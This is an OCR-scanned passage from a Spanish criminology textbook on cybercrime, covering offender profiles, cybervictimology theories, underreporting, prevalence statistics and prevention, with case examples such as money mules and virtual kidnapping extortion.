Ej. 3.5: Una de las modalidades más cono •idas es la del "mulero banca-
rio": mediante una oferta de trabajo con apari ncia más o menos real, aunque
con unas condiciones laborales muy sugerentes, determinadas mafias cibercri-
minales se aprovechan de terceros para completar un proceso delictivo. Estos
muleros son una pieza clave en el entramado de la estafa informática conocida
como phísíng: son los que reciben la transferencia proveniente de la cuenta co-
rriente de la víctima y reenvían parte del dinero a los delincuentes.

Algunas investigaciones (CIPC, 2018) también hablan de perfiles de ciber-


criminales económicos concretos, como es el caso de los fraudsters hackers o
estafadores informáticos, a los que atribuyen algunos rasgos específicos: mu-
chos de ellos son cometidos por ciberdelincuentes varones y jóvenes, prove-
nientes de África y de la Península Arábiga, como medio de subsistencia.
b) Cibercriminal político: la delincuencia de corte ideológico o político
cometida a través de medios informáticos y plasmada en el ciberespacio en-
tra dentro de esta categoría, que englobaría tanto la llevada a cabo por grupos
organizados, caracterizados por un funcionamiento jerárquico más horizon-
tal y difuso, como por sujetos individuales sin conexión con las mismas. La
principal motivación del cibercriminal político es la plasmación y, en ocasio-
nes, imposición de su ideología (cyberhate) y la lucha contra el establishment
por vías más o menos expeditivas (hacktivismo, ciberterrorismo ).
c) Cibercriminal social: se trata de una categoría bastante heterogénea,
que recoge las características de los sujetos que han cometido delitos cuyo
bien jurídico protegido no es ni el económico ni el político. Existen numero-
sos perfiles de cibercriminales dependiendo de la tipología delictiva concreta
que se haya cometido: cyberstalker, cyberbuller, groomers, etc. En realidad,
debemos coincidir con algún autor (Mmó LLINAREs, 2012), en que lo realmente
interesante es analizar cómo el ciberespacio, al modificar el ámbito de riesgo
en el que se comete el delito, también cambia en muchos casos el perfil de
quien lo comete. Por esta razón, nos remitimos a los apartados correspon-
dientes a las tipologías delictivas concretas que se estudian en este libro, don-
de se incluirán las pertinentes consideraciones sobre el perfil de los cibercri-
minales.
Otra clasificación posible del perftl de los cibercriminales es la que se
extrae de su nivel de profesionalización, así como de su actuación singu-

- 106 -
Capítulo 3. PARTICULARIDADES DE LA CRJMINA11 l)A1) IUlLA ( NADA CON LAS TIC

lar o grupal. Así, se habla del ciberdelln u nt oportunista o ciberventajista,


persona ambiciosa, racional (realiza 1 ion s ponderadas de los riesgos)
y sin escrúpulos que encuentra en el delito una forma de enriquecerse, por
lo que esporádicamente cometerá delitos informáticos como una forma de
aumentar sus ingresos puntualmente (no hay intención de una carrera cri-
minal prolongada); el ciberdelincuente común o ciberpandillero, jóvenes que
cometen ciberdelitos económicos menores, sin buscar nuevas experiencias,
ni sensaciones y tampoco el reconocimiento social, su carrera criminal suele
ser efímera y restringida a los años de juventud; el ciberdelincuente habitual,
que se divide, a su vez, en ciberneoprofesional, ciber-profesional y el ciber-a-
sueldo: el primero de estos términos designa a quien ha convertido el delito
informático en su modus vivendi y se caracteriza por unos conocimientos de
programación limitados, por lo que hace uso de los kits de herramientas pre
generados para llevar a cabo sus ataques y buscar reconocimiento mediáti-
co; ciberdelincuente profesional también ha convertido el cibercrimen en su
modo de vida especializándose en la materia, pero se define como autónomo
y opera en su propio beneficio; el ciberdelincuente a sueldo es contratado por
un segundo cobrando por sus servicios.
Ej. 3.6: Dentro de los ciberdelincuentes habituales, por ejemplo, un domaí-
ner· formarían parte del grupo de los ciberventajistas, puesto que aprovechan de
manera puntual una determinada coyuntura de demanda de nombres de domi -
nios para enriquecerse. Los traficantes y los agentes especiales pertenecerían al
subgrupo de los cíber-a-sueldo, mientras que un bauquero se identificaría con
el perfil de un ciberdelinc:uente profesional.

III. LA VÍCTIMA FRENTE AL CIBERDELITO: PERFIL VICTIMOLÓGICO

Los rasgos que definen a la víctima en la cibercriminalidad (cibervícti-


ma es el término más extendido para denominar al perjudicado por el hecho
cibercriminal), como tendremos ocasión de comprobar en este epígrafe, se
alejan sustancialmente de aquellos que caracterizan a la víctima de los de-
litos "tradicionales" o pertenecientes al mundo físico y que ocupan a la Vic-
timología, como parte intrínseca de la Criminología. La importancia que la
Victimología ha adquirido como disciplina autónoma es incuestionable, a pe-
sar de que su origen científico es relativamente reciente (una vez concluida la
Segunda Guerra Mundial). Pues bien, oportunamente la todavía más novedo-
sa cibervictimología se presenta ahora como una especialidad indispensable
para entender la ciberdelincuencia, debido a dos notas esenciales: su influen-
cia directa o indirecta para que nazca la posibilidad de cometer el (ciber)de-

- 107 -
Cibercriminalídad.
Segunda parte.ASPECTOS PENALES Y CRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

lito (según la doctrina, la víctima ejerce aquí una influencia más intensa que
la desempeñada en el hecho criminal "terrenal o analógico", estudiada por la
Victimología tradicional), y el ecosistema en el que deben interaccionar ci-
berdelincuente y cibervíctima, representado por un lugar que ocupa un espa-
cio abstracto, sin barreras físicas ni arquitectónicas, esto es, el denominado
mundo virtual.

l. La política criminal frente a la cibercriminalidad

Por otra parte, la sensación de seguridad de las sociedades es uno de


los puntos neurálgicos del modelo político criminal que al parecer estamos
transitando, el denominado modelo securitarista, un modelo de intervención
penal caracterizado, entre otros factores, por dotar de un papel primordial
a las víctimas frente a los victimarios, con una presencia más acusada tanto
en la toma de decisiones político criminales como en el desarrollo del propio
proceso penal (MELENDO PARDOS, CALLEJO GALLEGO & LACRUZ LóPEZ, 2019). Y este
factor, en efecto, se centuplica en el ámbito del diseño y las intervenciones de
política criminal que se están desarrollando en relación con la cibercriminali-
dad, una vez constatado que existe un incremento exponencial de la ciberde-
lincuencia, especialmente la relativa al fraude informático.
Ej. 3.7: Por ejemplo, la creación de redes o puntos operativos de contacto
24x7, disponibles las 24 horas del día, todos los días de la semana, forma parte
de una estrategia global que cada país se compromete a establecer para poder
identific31; prevenir y facilitar asistencia técnica y jurídica en la identificación
y combate de conductas ilícitas cometidas a través de sistemas de cómputo e
Internet (Convenio sobre ln Ciberdelincuencia de Budapest, art. 35).

Claramente, la prevención, la educación social en el manejo de Internet


y los sistemas de alerta dirigidos a las víctimas juegan un papel central en el
diseño de la política criminal dirigida a las infracciones cometidas a través de
la Red. De hecho, las cuentas en RRSS de diferentes cuerpos de seguridad del
Estado, como Policía Nacional o Guardia Civil, cuentan con miles de seguido-
res, y ya resultan una herramienta casi indispensable para que aumente la
socialización y el buen uso de las nuevas tecnologías (MELENDO PARDOS, CALLEJO
GALLEGO & LAcRuz LóPEZ, 2019). Sin embargo, pese al rol primordial que la víc-
tima del delito ostenta en la actualidad, en el caso español avalado por la Ley
4/2015, de 27 de abril, del Estatuto de la víctima del delito, no solo en cuanto
a la reparación del daño en el marco de un proceso penal, sino también orien-
tada a minimizar otros efectos traumáticos en lo moral que la propia condi-
ción de víctima puede acarrear, y todo ello con independencia de su situa-

- 108 -
Capítulo 3. PARTICULARIDADES DE LA CRJMINALll>Al1 JII IA('IONAUA ('( N LA •n t

ción procesal, las referencias del legislador n di h 1 y a la situación de las


cibervíctimas en algunos apartados son nuL , por ejemplo en el relativo a la
protección de las víctimas, laguna que no s entiende teniendo en cuenta las
particularidades que rodean a la cibercriminalidad, sobre todo atendiendo al
constatado incremento sostenido en el tiempo (apuntado con anterioridad)
y que el consiguiente aumento de cibervíctimas es un hecho a nivel mundial.
Es destacable, asimismo, la convivencia de esta intensificación ciberdelin-
cuencial con el declive de la delincuencia tradicional violenta (crime drop),
un fenómeno progresivo que se inició en la década de los años 90 en la mayor
parte de países de nuestro entorno.
Los antecedentes y fundamentos del Estatuto de la víctima del delito se en-
cuentran en la Decisión Marco 2001/220/JAI del Consejo, de 15 de marzo de 2001,
relativa al estatuto de la víctima en el proceso penal, que reconoce un conjunto de
derechos de las víctimas en el ámbito del proceso penal, incluido el derecho de
protección e indemnización, y que fue el primer proyecto profundo del legislador
europeo para lograr un reconocimiento homogéneo de la víctima en el ámbito de
la Unión Europea. La nueva Directiva 2012/29/UE del Parlamento Europeo y del
Consejo, de 25 de octubre de 2012, sustituye la Decisión Marco y establece normas
mínimas sobre los derechos, el apoyo y la protección de las víctimas de delitos. En
concreto, en el marco de derecho interno, el complemento de la normativa particu-
lar se extiende a la Ley 35/1995, de 11 de diciembre, de ayudas y asistencia a las
víctimas de delitos violen~os y contra la libertad sexual (desarrollada por el Real De-
creto 738/1997, de 23 de mayo), la Ley Orgánica 1/ 1996, de 15 de enero, de Protec-
ción Jurídica del Menor, la Ley Orgánica 1/2004, de 28 de diciembre, de Medidas de
Protección Integral contra la Violencia de Género, así como la Ley 29/2011, de 22 de
septiembre, de Reconocimiento y Protección Integral a las Victimas del Terrorismo 1.

2. Eventualidad delictiva y prevención del cibercrimen: especial


referencia a la teoría de las actividades cotidianas y a la teoría
del Actor-Red

La perspectiva victimológica en relación con el grado de contribución de


la víctima al delito concreto reúne una serie de teorías que, en síntesis, sostie-
nen que la conducta de la víctima no es un elemento neutro - originariamente
a través de las teorías del control social, frente a las que surgieron las teorías
de la prevención situacional.

1 Existen medidas cautelares de protección a la víctima como la retirada de conteni-


dos, la interrupción de prestación de servicios al ciberdelincuente, la prohibición de comuni-
cación online, etc. (art. 13, en relación con el art. 544 bis de la LECrim, que alude a los delitos
comprendidos en el art. 57 del CP respecto de las medidas que contiene el art. 48 del CP).

- 109 -
Cibercriminalldad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

El desarrollo teórico y empírico de la cibervictlmización todavía se en-


cuentra en una fase incipiente. Sin embargo, aunque algunos autores defendían
la validez de las teorías de la prevención situacional para explicar el rol de las
víctimas en la cibercrirninalidad, es la conocida teoría de las actividades rutina-
rias o cotidianas (TAC), aplicada al cibercrimen, la que aglutina más seguidores.
Más que de una teoría, se trata de un conjunto de proposiciones bastante vagas,
desarrolladas por CoHEN y FELSON en la década de los años 80 del s. XX. que decla-
ra que la unión de un delincuente capacitado, un objetivo o víctima adecuado y
la ausencia de guardianes capaces de neutralizar la conducta del delincuente,
conforman el escenario más propicio y probable para que ocurra un crimen.
Este enfoque, derivado de los llamados modelos de oportunidad, que vinculan
la victimización tanto a la conducta arriesgada inherente al estilo de vida de la
víctima como a las oportunidades que ofrece la cotidianidad de las actividades
de la sociedad actual, reúne los ingredientes básicos del evento criminal y los
incorpora en una relación dinámica - junto a la fórmula de la teoría de la elec-
ción racional, cuya premisa básica es que la suma del comportamiento social
resulta del comportamiento de los actores individuales, cada uno de los cuales
torna sus decisiones de manera individual. Esta teoría también se centra en los
determinantes de las elecciones individuales y así, las actividades cotidianas
operarían tanto a nivel micro corno macro (MATTHEWS, 2014). Por tanto, la no-
ción de actividades cotidianas hace referencia a estilos de vida que constituyen
patrones regulares en la sociedad y precisamente la evolución tecnológica ha
creado nuevos espacios de oportunidad delictiva porque ha incrementado la
convergencia de los tres factores representativos de esta teoría (delincuente
capacitado, víctima adecuada y ausencia de guardián eficaz).
En el contexto de la cibercrirninalidad, esta teoría o conjunto de propo-
siciones es especialmente útil, aunque probablemente superada, corno vere-
mos a continuación al explicar la teoría del Actor-Red, pues nos referimos a
cualquier delito cometido esencialmente mediante el uso de las TIC, ciberde-
lito en sentido amplio, que confluye en un espacio original y por lo tanto, en
un contexto de oportunidades nuevo respecto de la criminalidad analógica,
porque no existen barreras espaciales, ni dimensiones físicas, y además re-
quiere del contacto e interacción entre el agresor y la victima en un ámbito de
riesgo que ya no es propiedad exclusiva del delincuente (Mrnó LLINARES, 2012).
Este mismo autor ha señalado que existen tres factores fundamentales para
que la víctima adquiera un papel tan preponderante en la explicación y la pre-
vención de los delitos en el ciberespacio:
l. La cibervíctima potencial posee una gran capacidad para no permi-
tir o expulsar del ámbito de riesgo todo aquello que no quiere que
sea afectado, los márgenes genéricos del ámbito de riesgo quedan

- 110 -
Capitulo 3. PARTICULARIDADES DE LA CRIMINA1.1 IM I HfllACl NADA CON LAS TIC

bajo su control. A pesar de la apar nt quivalencia entre no aban-


donar el domicilio privado para vi r un potencial robo en la calle
y no dejar entrar al ciberdelincu nt n el ámbito privado de la víc-
tima, existe una diferencia fundam ental: en el caso del robo, el la-
drón puede elegir perpetrar el robo en el domicilio de la víctima sin
esperar a que esta se encuentre fuera del mismo; sin embargo, en el
caso del ciberdelito, este no será ejecutable, de ninguna manera, si la
propia víctima no ha introducido previamente en el ciberespacio los
datos, bienes, imágenes, etc., en suma, la información que permite el
ataque por parte del ciberdelincuente.
2. La víctima delimita, a través del grado de interacción que mantiene con
el ciberespacio, el grado de visualización de sus objetivos y as~ las po-
sibilidades de contacto con el agresor motivado en un mismo espacio y
tiempo o en otro diferente. De nuevo aparece aquí una similitud con la
posibilidad de convertirse en victima si esta visita determinados luga-
res o emplazamientos arriesgados en el mundo físico que no es del todo
real, pues la diferencia es que el ciberespacio no requiere ni tiempo ni
distancia o aproximación física para la interacción entre agresor y víc-
tima. Adicionalmente, otro factor a tener en cuenta es que conocemos
muchas de las conductas que pueden resultar peligrosas a la hora de
sufrir determinados delitos en el mundo físico, pero la identificación de
conductas de riesgo en el ciberespacio se encuentra todavía en una fase
incipiente de evaluación. En este punto, nosotros nos adherimos a la
postura de la doctrina mayoritaria (nacional y extranjera) acerca de la
carencia de medidas de análisis cuantitativos y cualitativos sobre ciber-
criminalidad, y la necesidad de impulsar estudios fiables que sirvan de
soporte a esta disciplina ya imparable por razones obvias, y que pueden
ayudar a superar el relato, a veces distorsionado, que se ofrece sobre la
realidad del cibercrimen y sus cifras reales a la sociedad, información
muchas veces tergiversada por confluir otros intereses por parte de los
medios de comunicación, de las instituciones y de los Estados.
3. La víctima es uno de los sujetos capaz de incorporar guardianes ca-
paces para su (auto)protección que eviten o repelan las conductas de
los ciberdelincuentes (por ejemplo, instalando cortafuegos, antivi-
rus actualizados, realizando un uso adecuado de las redes sociales
(RRSS), no permitiendo el acceso a mícrófonos e imágenes de nues-
tro dispositivo cuando alguna aplicación instalada nos lo pide, etc.).
Al no existir guardianes formales institucionalizados como en el
mundo físico (no existe un policía virtual que nos sanciona si la au-
topista que tomamos en la Red está prohibida, ni tampoco contamos

- 111 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

con sistemas de control formal de carácter supranacional que adop-


ten decisiones relativas a los servicios en Internet que rebasen las
legislaciones internas de los Estados), el manejo de las TIC y de los
sistemas digitales de (auto)protección (que incluyen tanto la insta-
lación como la actualización periódica de los mismos) son elemen-
tos decisivos para convertirse o no en cibervíctima, porque el guar-
dián capaz, en el ciberespacio, es prácticamente un autoguardián que
depende de la propia victima (MIRó LLINARES, 2012).
Aunque la delincuencia y la victimización por delitos cibernéticos se han es-
tudiado en gran parte por separado, existe evidencia suficiente que apunta a que
existen factores de riesgo compartidos, es decir, las víctimas y los delincuentes
comparten unos mismos factores de riesgo como el autocontrol bajo, las activida-
des rutinarias o un estilo de vida arriesgado, y también sociodemográficos, todos
ellos elementos que aumentan tanto el riesgo de ofensa como de victimización.
Además, la ofensa puede causar directamente victimización o viceversa y esto
indica que el delito cibernético y la victimización comparten correlatos subya-
centes similares, y como tales deben estudiarse en conjunto, como también es
evidente en los crímenes tradicionales (WEULEN KRANENBARG et al., 2017). Como
segundo factor de riesgo, las actividades cotidianas en línea permiten la conver-
gencia digital de los delincuentes y las víctimas y pueden asociarse con una su-
perposición de víctimas y delincuentes cibernéticos. La participación individual
en actividades rutinarias o cotidianas que aumentan el nivel de exposición ante
los delincuentes motivados puede aumentar desproporcionadamente el riesgo
de victimización. Lo que hasta la fecha se conoce respecto de los niveles de miedo
frente al delito concretados en el contexto digital, como sugiere uno de los prime-
ros estudios de este fenómeno, es que existe una mayor percepción de invulnera-
bilidad en comparación al espacio físico, y esto influye notoriamente en las dife-
rentes medidas de autoprotección con las que el sujeto afronta las consecuencias
de una potencial cibervictimización (CASTRO TOLEDO YMrnó LLINARES, 2018).
Ej. 3.8: Por ejemplo, un pionero estudio ha demostrado que la secreción de la
hormona del estrés (cortisol) y el acoso en Internet están íntimamente relaciona-
dos; a su vez, la secreción de cortisol es más elevada en el ciberacoso que en el acoso
tradicional. probablemente porque la audiencia es más amplia, anónima en muchos
casos y factible en cualquier momento y lugar, y ello genera que las consecuencias
sean percibidas como más peligrosas o dafiinas (GoNZALEZ-CABREHA et al .• 2017).

Desde la perspectiva de la victimología del desarrollo (la concreta vul-


nerabilidad infantil y juvenil ha suscitado esta reciente línea de estudio)2 en

2 La Victimología del desarrollo demanda un enfoque específico, propio, relativo a la


edad y el contexto en que se produce la victimización y la reacción a la misma (FINKELHOR, 2008).

- 112 -
Capítulo 3. PARTICULARIDADES DE LACR.l.MJNAI JI All l E A IONADA CON LAS TIC

la era digital, un grupo especialmente vuln r bl son los menores o jóvenes,


que experimentan una anticipación en 1 d d de acceso a las TIC cada vez
más acelerada y, por tanto, una alteración d u uso en las actividades cotidia-
nas llevadas a cabo en el ciberespacio. Ad más, la cibervictirnización de los
menores es más frecuente que la de los adultos, convirtiéndose en victimas
ideales por el desconocimiento de su propia victimización, al no tener con-
ciencia de las conductas arriesgadas con las que obran en la Red. La prevalen-
cia de victimización sexual online (sexting, grooming, es la más elevada y pue-
de estar relacionada con otras como el ciberbullying, así corno otros patrones
de victimización ofjline). Aquí, la polivictimización (combinación de diferen-
tes formas de victimización o acumulación de acontecimientos victimizantes,
tanto online como offline) es más habitual que la victimización causada por
un solo modelo y desde el ámbito de la prevención, parece claro que las medi-
das deben ser gestionadas primordialmente desde el entorno del menor (fa-
miliares, padres, tutores, centros educativos, etc.) (MoNTIEL & AGUSTINA, 2018).
La existencia de una relación significativa entre la visibilidad en el cibe-
respacio y la victimización por malware, principalmente en la franja de edad
juvenil, se corresponde con el hecho de que los jóvenes llevan a cabo ciertas
actividades cotidianamente, por lo que el riesgo de que sus dispositivos se in-
fecten de códigos maliciosos aumenta (GARCÍA GUILABERT, 2016). Por otra parte,
tenemos que contar con el efecto multiplicador y en cascada de la llamada
extimidad (ver Introducción Capítulo 4) frente a lo que históricamente se ha
considerado la protección (penal) de la intimidad, debido básicamente al flo-
recimiento de las RRSS, la telerrealidad, los videojuegos (entre otras herra-
mientas), que han transformado la manera de entender lo privado.
Ej. 3.9: Existen indicadores que muestran que los usos sociales en la Red es-
tán cambiando. Por ejemplo, 3 de cada 4 personas están más alarmadas que mm-
ca por los riesgos de vulnen1ción del derecho a la privacidad y 1 de cada 5 ya ha
eliminado una cuenta de redes sociales en respuesta a esta inquietud. Los consu-
midores japoneses son los menos propensos a tomar medidas para proteger sus
actividades en línea, así como su información personal, precisamente al contar
con una de las tasas más bajas de delitos cibernéticos y suplantación de identidad
identificadas en un estudio de 2018 (NoRTON L1FELocK CvBFR SAFFTY lNSIGHTs REPORT).

El hecho de que la TAC haya sido la más aplicada en los, por otra parte
limitados estudios sobre cibervictimización, no representa un éxito absoluto a
la hora de explicar el rol de la víctima en el ciberdelito. Muy al contrario, otras
investigaciones han encontrado escaso o nulo apoyo empírico en esta teoría,
sobre todo en relación con la cibervictimización de alta tecnología. Por ejem-
plo, VAN DER WAGEN & PIETERS (2018) optan por una caracterización híbrida de la

- 113 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINAIJDAD RELACIONADA CON LAS TIC.

cibervíctima y aplican la teoría del Actor-Red (Actor-Network Theory -ANT-).


La ANT es un enfoque crítico y constructivista que proporciona un marco con-
ceptual en el que las entidades, actores y acciones son contemplados como par-
tes de una red heterogénea y compleja. Esta teoría no diferencia a priori entre
entidades en términos esenciales, por ejemplo, humano versus no humano o
víctima versus delincuente. Más bien le interesa la actividad de las diferentes
entidades (como una red) y su contribución en ciertas acciones o resultados.
Partiendo de esta perspectiva, estos autores proponen conceptualizar a la víc-
tima cibernética como una red heterogénea consistente en la interactuación
con entidades humanas, técnicas y / o virtuales que deben ser atacadas, en-
gañadas y / o controladas de manera relacional por el delincuente. Este mar-
co alternativo consta de tres conceptos interrelacionados: "composición de la
víctima" (victim composition), "delegación de la víctima" (victim delegation) y
"desplazamiento de la víctima" (victim translation), cuya combinación permite
una comprensión más matizada del proceso híbrido y complejo de convertirse
en una víctima cibernética de alta tecnología que la proporcionada por la TAC,
que generalmente se refiere a entidades individuales.
Respecto de la noción de victim composition, las entidades no humanas,
como los sitios web y el software, también son considerados una parte inte-
grada de la red victimizada, en lugar de ser considerados meramente guardia-
nes o agentes protectores. Esto también implica que no deberíamos demarcar
a priori una vulnerabilidad humana y una técnica como entidades separadas,
sino observar la vulnerabilidad como una red híbrida compuesta por ambas. El
concepto de victim delegation, por su parte, alude al proceso en el que el delin-
cuente asigna una tarea, un rol o acción a varias entidades humanas (usuarios
de computadoras y propietarios de sitios web) o a entidades no humanas (má-
quinas comprometidas y kits de explotación). La delegación de víctimas inclu-
ye la contribución de cualquier entidad (humana o no humana) en la red, y no
soporta el trasfondo de culpar a la víctima. Permite el estudio de la parte del
proceso de victimización llevada a cabo por cada actor, al mismo tiempo que es
sensible a la opción de que el papel de la entidad en este proceso puede cam-
biar con el tiempo, que conduce al concepto de victim translation. Este último
afirma que la idoneidad del objetivo no se considera algo preexistente, sino que
se determina y genera en parte durante el proceso de victimización. Al mismo
tiempo, se presume que la víctima o la red victimizada está sujeta a cambios a lo
largo de este proceso y por tanto no es tratada como un ente totalmente pasivo.
Incide en la fluidez y la naturaleza contagiosa del proceso de victimización, es
decir, la víctima puede ser el "destino final", pero al mismo tiempo el comienzo
de una nueva cadena de infecciones. En resumen, el desplazamiento de la vícti-
ma, como la delegación de la víctima, subraya la victimización como un proceso
o evento (complejo} y resta importancia a la propia entidad victimizada.

Si por alguna característica podemos comenzar a distinguir a la vícti-


ma de cibercriminalidad en el contexto actual, esta es precisam nte la uní-

- 114 -
Capitulo 3. PARTICULARJDADES DE LACRJMINALI l)AO R LACIONADA CON LAS TIC

versalidad en cuanto a la posibilidad d s r víctima del ciberdelito, aunque


paradójicamente, al inicio de lo que hoy conocemos como mundo virtual,
las víctimas estuvieran representadas exclusivamente por los sujetos que
se relacionaban con la "máquina", que utilizaban Internet en su entorno la-
boral o social, y que en cierta medida pertenecían a la élite o a un grupo re-
ducido de individuos de las sociedades avanzadas, los afortunados sujetos
que podían tener acceso al mundo digital. Esta situación ha cambiado de
forma muy veloz, tanto cuantitativa como cualitativamente, al albur de la
democratización del acceso a la Red. Más de la mitad de la población mun-
dial actualmente está conectada en línea (INTERNET WoRLD STATS 2019), y la
consecuencia es directamente proporcional, más de la mitad de la pobla-
ción mundial se encuentra en riesgo de convertirse en víctima de una ofen-
sa cibernética personal.

3. Ambigüedad en torno a la cifra negra en la cibercriminalidad

Aunque conocemos que regionalmente Asia cuenta con el mayor núme-


ro de usuarios y Oceanía-Australia con el menor, lo que no sabemos clara-
mente es qué fracción de la población ha sido realmente víctima de este tipo
de delito, desconocimiento directamente relacionado con la elevada cifra ne-
gra existente. Las razones que explican este nivel de impunidad se pueden
resumir en las siguientes:
En primer lugar, la frecuente ausencia de denuncia por parte de la víc-
tima, que puede derivar de razones muy diversas, ligadas a la propia tipo-
logía heterogénea de la cibercriminalidad, por lo que la cifra negra también
sufre variaciones respecto de los distintos ciberdelitos (MrRó LL1NARES, 2012).
La ingeniería social es una técnica para manipular a las víctimas y lograr que
compartan información confidencial. Esto puede suceder a través de correos
electrónicos falsos, llamadas telefónicas, mensajes de texto o publicaciones
(e incluso dejar una memoria USB infectada con malware), y con frecuencia
implica la recopilación de información de diversas fuentes, como las redes
sociales y la correspondencia interceptada, para parecer convincente y con-
fiable. La naturaleza a menudo compleja del ataque hace que sea extremada-
mente difícil detectar una estafa antes de que sea demasiado tarde.
Ej. 3.10: Los motivos para decidir no denunciar no solo están relaciona-
dos con la vergüenza que produce en la víctima reconocer, por ejemplo, que ha
sido timada, estafada (pensemos en una de las estafas más actuales, la del falso
amante o el don Juan estafador a través de la web - Romance scam) sino que en
un alto porcentaje de casos desconoce su propia condición de víctima (víctima
ignorante). Por ejemplo, si alguien vierte una serie de afirmaciones injuriosas

- 115 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINAIJDAD RELACIONADA CON LAS TIC.

en Twitter contra un sujeto que no es usuario de RRSS y que no tiene una re-
levancia pública pam que la noticia llegue a sus oídos por otros medíos, difí-
cilmente llegará a conocer el hecho, o bien transcurrirá un lapso temporal que
puede desembocar en la prescripción del delito

En el caso de la ciberdelincuencia sufrida por empresas (la persona jurí-


dica corno víctima del ciberataque), los estudios reflejan que las corporacio-
nes no denuncian los ataques sufridos por el coste del factor de descrédito
reputacional ante sus clientes si admiten públicamente que una vulnerabili-
dad de su sistema ha sido explotada, por lo que con frecuencia simplemente
prefieren asumir las pérdidas derivadas del ataque pagando las indemniza-
ciones a los clientes afectados antes que soportar la publicidad del ataque.
Ej. 3.11: Por ejemplo, puede que, a determinados sectores, como la banca
electrónica, les resnlte más ventajoso a medio y largo plazo indemnizar a los
clientes que denunciar y revelar públicamente los fraudes online sufridos (Mrnc)
LlrNARES, 2012).

En segundo lugar, aunque exista denuncia formalizada, nos encontra-


mos ante delitos que no pueden ser detectados sin un nivel de investigación
elevado, investigación que en el espacio cibernético es especialmente com-
pleja debido a la alta sofisticación de los ciberdelincuentes y / o al hecho de
que estos delitos se cometen a través de sistemas o canales que dificultan la
identificación del delincuente -correos electrónicos (re)enviados de forma
anónima, sistemas de cifrado de mensajes, suplantación de identidad, utiliza-
ción de redes wifi públicas, utilización de botnets, etc.) (AGUSTINA, 2015, DE LA
CUESTA ARZAMENDI & PÉREZ MACHÍO, 2010).

4. Prevalencia y estadísticas de cibervictimización

Las dos principales fuentes estadísticas sobre prevalencia de víctimas 3


son las encuestas de victimización (con sus limitaciones) y los registros poli-
ciales. R.EEP-VAN DEN BERGH & JUNGER (2018) han elaborado un reciente estudio
que muestra la prevalencia estimada de seis tipos de delitos informáticos en
Europa desde 2010:
• compras online fraudulentas;
• operaciones bancarias online fraudulentas;

3 La prevalencia es un concepto epidemiológico que describe el número de casos que


se han producido sobre un determinado evento en una población y momento d terminado.

- 116 -
Capítulo 3. PARTICULARIDADES DE LA CRJMJNA Ll!)A OR · LACIONADA CON LAS TIC

• otros fraudes cibernéticos - como el fraude de tarifa avanzada y otros


fraudes de identidad;
• ciberacoso y ciberamenazas;
• malware;
• hacking.
Generalmente la tasa de prevalencia ha aumentado en todos ellos, en
unos más significativamente que en otros, pero en todo caso, estas estima-
ciones se fundamentan en metodologías de entrevistas diferentes, la inte-
rrelación de preguntas diversas, las disparidades propias de cada país o los
cambios de período, y posiblemente sufren el resultado de un proceso de se-
lección sesgado. Otro aspecto importante que debe tenerse en cuenta al inter-
pretar los resultados es que la penetración y la intensidad del uso de Internet
pueden diferir entre las poblaciones estudiadas. Que un mayor uso de Inter-
net conlleva un mayor riesgo de ser victima de un delito cibernético parece
algo obvio, en el caso de las compras online fraudulentas, por ejemplo, cuya
operacionalización es bastante sencilla. Este estudio afirma que las tasas de
prevalencia anual han aumentado de 0,6 a 3% o 4% en relación con este deli-
to. Sin embargo, en otra tipología como las operaciones bancarias online frau -
dulentas, el aumento ha sido mucho menor, pues bien, aquí las autoras in-
teresantemente observan que varias medidas preventivas adoptadas por los
bancos, a saber, el bloqueo geográfico, la protección física de los cajeros au-
tomáticos contra el robo, el monitoreo de transacciones y la cooperación con
la policía, en el caso de Holanda, han resultado en una fuerte disminución del
fraude bancario. Sin embargo, contradictoriamente, Suecia no experimentó
ningún descenso, aunque se había implantado el mismo paquete de medidas,
sin que se conozca la causa que explicaría tal contraste.
Este estudio también recoge las diferencias entre los tipos de cuestiona-
rios realizados con encuestas de autoevaluación (online, por teléfono y face
to face ), estructurado por las tipologías ciberdelictivas más frecuentes, entre
ellas el cyberbullying, hacking y malware, e incluye el impacto emocional de
cada ciberdelito (REEP-VAN DEN BERGH & JUNGER, 2018) .

5. Cibervíctima y prevención del ciberdelito

La cibervíctima mantiene una relación con la prevención especialmente


significativa, mucho más profunda que la existente en las víctimas de los de-
litos del mundo físico o analógico, es decir, las que producen los delitos tra-
dicionales, que desafían en menor medida la conexión física entre agresor y
víctima. El ciberdelincuente en sentido amplio no necesita, en una gran parte

- 117 -
Cibercriminalidad.
Segunda parte. ASPECTOS PENALES YCRIMINOLÓGICOS DE LA CRIMINALIDAD RELACIONADA CON LAS TIC.

de supuestos, aproximarse a la víctima, asirla del brazo, coaccionarla física-


mente, sino que bastará con el mero contacto virtual, en cualquiera de sus
manifestaciones.
Ej. 3.12: Los mal conocidos como "secuestros virtuales" (surgidos en
2015 ) técnicamente solo pueden ser constitutivos del delito de extorsión (art.
243 CP), al ser el secuestro una pura ficción. Se trata de un tipo de delito en
el que, a través de una llamada telefónica (provienen de llamadas inesperadas
con número oculto o con prefijo 0056 o +56), el interlocutor (victimario que
físicamente puede encontrarse en otro país) hace creer a la víctima que ha se-
cuestrado a una persona de su círculo famfüar o social y exige con rapidez una
determjnada cantidad de dinero para liberarlo. El modus operandi implica que
la conexión digital entre ambos no se interrumpa en ningún momento, el extor-
sionador sencillamente tendrá que conseguir que la víctima no se despegue de
su dispositivo (teléfono móvil o fijo, tableta) hasta lograr el objetivo, conseguir
que el extorsionado transfiera la cantidad exigida. En este caso, el extorsiona-
dar elimina la posibilidad de ejecutar actos de violencia física, le bastará con
que la violencia psíquica ejercida sobre la víctima sea efectiva y esta realice u
omita el acto o negocio jurídico que perjudica a su patrimonio. Las mafias espe-
ciaUzadas en esta modalidad delictiva obtienen los datos de sus potenciales víc-
timas fundamentalmente a través de RRSS, y la cifra de extorsiones telefónicas
en Espaf\a ha sufrido un repunte en los últimos años, com o se desprende tanto
de las estadísticas policiales como de las medidas de prevención publicadas por
la Policía Nacional4.

La prevención original (por el origen) acoge solo aquellos casos en los


que la víctima, por sí misma, no establece ninguna barrera de prevención, ya
